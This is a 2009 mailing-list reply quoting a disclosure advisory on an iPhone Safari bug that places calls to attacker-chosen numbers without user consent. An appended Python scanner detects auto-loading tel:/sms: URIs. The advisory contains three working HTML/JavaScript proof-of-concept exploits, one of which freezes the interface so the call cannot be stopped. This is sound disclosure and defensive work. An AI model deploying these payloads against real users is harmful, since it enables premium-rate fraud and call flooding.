Message-ID: <4A39F3D1.4040802@betaversion.net>
Date: Thu, 18 Jun 2009 09:14:57 -0700
From: Mike Ely <me@...pehat.com>
To: Collin Mulliner <collin@...aversion.net>, bugtraq@...urityfocus.com,
full-disclosure@...ts.grok.org.uk
Subject: Re: iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)
Confirmed on the T-Mobile G1 email app running OS version 1.5. Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
FWIW, it didn't actually dial, just loaded the dialer with that number ready.
Looks like this is a Webkit bug, not Safari.
Collin Mulliner <collin@...aversion.net> wrote:
>Released since Apple published the iPhone 3.0 security fixes.
>
>Vulnerability Report
>
>--- BEGIN ADVISORY ---
>
>Manufacturer: Apple (www.apple.com)
>Device: iPhone 3G (iPhone 1st Gen)
>Firmware: 2.1 (possible earlier versions)
>Device Type: smart phone
>
>Subsystems: Safari (and mobile telephony)
>
>-----------------------------
>
>Short name:
> iPhone Safari phone-auto-dial (vulnerability)
>
>Vulnerability class:
> application logic bug
>
>Executive Summary:
> A malicious website can initiate a phone call without the need of user
> interaction. The destination phone number is chosen by the attacker.
>
>Risk: MEDIUM-HIGH
> Medium to high risk due to the possibility of financial gain through
> this attack by calling of premium rate numbers (e.g. 1-900 in the
> U.S.). Denial-of-service against arbitrary phone numbers through
> mass-calling. User cannot prevent attack.
>
>-----------------------------
>
>Reporter: Collin Mulliner <collin[AT]mulliner.org>
>
>-----------------------------
>
>Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>
>-----------------------------
>
>Time line:
>
> Oct. 20. 2008: Reported vulnerability to vendor.
> Oct. 20. 2008: Vendor acknowledges receiving our email.
> Not commenting on the vulnerability itself.
> Oct. 27. 2008: Sent update to vendor, also requesting a status report.
> Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
> Oct. 30. 2008: Sent additional information.
> Nov. 13. 2008: Vendor says vulnerability is fixed in upcoming OS
> version.
> Nov. 20. 2008: Public disclosure.
> Jun. 18. 2009: Full-Disclosure.
>
>-----------------------------
>
>Fix:
>
> iPhone OS 2.2
> iPhone OS 2.2.1
> iPhone OS 3.0
>
>-----------------------------
>
>Technical Details:
>
> The Safari version running on the iPhone supports handling the TEL [1]
> protocol through launching the telephony/dialer application. This is
> done by passing the provided phone number to the telephony
> application. Under normal conditions, loading a tel: URI results in a
> message box asking the user's permission to call the given number. The
> user is presented with the simple choice to either press call or
> cancel.
>
> A TEL URI can be opened automatically if the TEL URI is used as the
> source of an HTML iframe or frame, as the URL of a meta refresh, as
> the location of a HTTP 30X redirect, and as the location of the
> current or a new window using javascript.
>
> We discovered a security vulnerability that dismisses the "ask for
> permission to call" dialog in a way that chooses the "call" option
> rather than the "cancel" option.
>
> This condition occurs if a TEL URI is activated at the same time
> Safari is closed by launching an external application, for example
> launching the SMS application (in order to handle an SMS URI [2]). The
> SMS application can be launched through placing an SMS URI as the
> source of an iframe. This is shown in the first proof-of-concept
> exploit below.
>
> Further investigation showed that this behavior can be reproduced by
> launching other applications such as: Maps, YouTube, and iTunes.
> Launching these applications can be achieved through loading special
> URLs using the meta refresh tag. This is shown in the second
> proof-of-concept exploit below.
>
> We also discovered that the bug can also be triggered through popup
> windows (e.g. javascript alert). In this situation the initiating app
> does not need to be terminated in order to activate the call.
>
> Finally, we discovered a second bug that can be used to perform
> malicious phone calls that cannot be prevented or canceled by the
> victim. This bug allows the attacker to freeze the GUI (graphical user
> interface) for a number of seconds. While the GUI is frozen the call
> progresses in the background and cannot be stopped by the victim user.
> Freezing the GUI is achieved by passing a "very long" phone number to
> the SMS application. The SMS application, immediately after being
> started, freezes the iPhone GUI. Also switching off the iPhone cannot
> be performed fast enough in order to prevent the malicious call.
>
>
> [1] http://www.rfc-editor.org/rfc/rfc3966.txt
> [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>
>-----------------------------
>
>Further Discussion:
>
> The dialing dialog is clearly shown to the user, but the user, in most
> cases, can't press cancel quickly enough in order to stop the initiation
> of the call. Once the external application is launched, the telephony
> application is running in the background performing the call. Only
> the call forwarding dialog (containing the "dismiss" button) indicates
> a call being made.
>
>-----------------------------
>
>Proof-of-Concept with plain HTML using the SMS application:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> </head>
> <body>
> <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> <!-- second iframe is to attack quick users who manage to close the
> first call-dialog //-->
> <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
> </body>
> </html>
>
>Proof-of-Concept using javascript and the Maps application:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> <meta http-equiv="refresh" content="0;
> URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
> </head>
> <body>
> <script lang=javascript>
> function a() {
> document.write("<iframe src=\"tel:+14089748388\" WIDTH=50 HEIGHT=10></iframe>");
> }
> setTimeout("a()", 100);
> </script>
> </body>
> </html>
>
>Proof-of-Concept attack where the victim user cannot stop the malicious
>phone call:
>
> <html>
> <head>
> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
> </title>
> </head>
> <body>
> <script lang=javascript>
> l = "<iframe src=\"sms:";
> for (i = 0; i < 10000; i++) {
> l = l + "3340948034298232";
> }
> l = l + "\" width=10 height=10></iframe><iframe src=\"tel:+14089748388\" height=10 width=10></iframe>";
> document.write(l);
> </script>
> </body>
> </html>
>
>-----------------------------
>
>More Detailed Information:
>
> Demo video available at:
> http://www.mulliner.org/iphone/
>
> Advisories:
> http://www.mulliner.org/security/advisories/
>
>--- END ADVISORY ---
>
>
>--
>Collin R. Mulliner <collin@...aversion.net>
>info/pgp: finger collin@...aversion.net
>If Bill Gates had a nickel for every time Windows crashed... Oh wait, he
>does!
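The advisory lists the contexts in which a tel:/sms: URI fires without a click (iframe/frame src, meta refresh, script-driven navigation), and the reply above notes a mail client was affected as well. The following is an added example, not part of either message, of the check a mail gateway or web proxy could run to flag pages that auto-load telephony URIs while leaving ordinary `<a href="tel:">` links alone; the sample HTML and phone numbers are constructed for the test.

```python
import re
from html.parser import HTMLParser

# URI schemes handed off to the telephony/SMS stack (RFC 3966 tel:, draft sms:).
PHONE_SCHEMES = ("tel:", "sms:")

# Matches script text that writes a frame or sets location to a tel:/sms: URI,
# including the backslash-escaped quotes seen inside document.write("...") calls.
_SCRIPT_NAV = re.compile(
    r"(?:src\s*=\s*\\?[\"']|location(?:\.href)?\s*=\s*[\"'])\s*((?:tel|sms):[^\"'\\]*)",
    re.IGNORECASE)

def _is_phone_uri(url):
    return url is not None and url.strip().lower().startswith(PHONE_SCHEMES)

def _meta_refresh_target(content):
    # '0; URL=tel:+1...' -> 'tel:+1...'; None when no target is present.
    if content is None or ";" not in content:
        return None
    target = content.split(";", 1)[1].strip()
    if target.lower().startswith("url="):
        target = target[4:].strip().strip("'\"")
    return target

class AutoDialFinder(HTMLParser):
    """Collects (context, uri) pairs for tel:/sms: URIs that load without a click."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame") and _is_phone_uri(a.get("src")):
            self.findings.append((tag, a["src"].strip()))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            target = _meta_refresh_target(a.get("content"))
            if _is_phone_uri(target):
                self.findings.append(("meta-refresh", target))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive as raw text, not as tags
            for m in _SCRIPT_NAV.finditer(data):
                self.findings.append(("script", m.group(1).strip()))

def scan(html):
    """Return every auto-loading tel:/sms: URI found in the document."""
    finder = AutoDialFinder()
    finder.feed(html)
    finder.close()
    return finder.findings
```

A page with a single `<a href="tel:...">` returns an empty list, because that link still requires the user's tap; the four vectors the advisory describes are the ones reported.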